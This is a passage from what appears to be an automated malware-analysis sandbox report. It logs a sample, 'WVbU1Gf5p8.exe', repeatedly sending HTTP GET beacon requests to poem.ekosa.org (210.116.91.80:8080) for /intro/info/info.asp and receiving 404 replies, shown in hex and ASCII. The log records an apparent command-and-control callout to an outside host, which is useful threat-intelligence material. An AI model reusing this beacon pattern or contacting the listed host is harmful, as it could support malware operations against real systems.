      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      64192.168.2.449832210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:34.413079977 CET543OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:34.673830032 CET543INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:34 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      65192.168.2.449833210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:34.952838898 CET544OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:35.225420952 CET545INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:34 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      66192.168.2.449834210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:35.605334044 CET545OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:35.869436979 CET546INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:35 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      67192.168.2.449835210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:36.134080887 CET547OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:36.395581007 CET547INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:35 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      68192.168.2.449836210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:36.665828943 CET548OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:36.928248882 CET548INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:36 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      69192.168.2.449837210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:37.310312033 CET549OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:37.573709965 CET550INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:36 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      7192.168.2.449766210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:00.678997040 CET124OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:00.949650049 CET130INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:00 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      70192.168.2.449838210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:37.850020885 CET550OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:38.122589111 CET551INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:37 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      71192.168.2.449839210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:38.393255949 CET551OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:38.658394098 CET552INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:37 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      72192.168.2.449840210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:39.049812078 CET553OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:39.309412956 CET553INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:39 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      73192.168.2.449841210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:39.579063892 CET554OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:39.839138985 CET555INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:39 GMT
      Connection: close
      Content-Length: 315
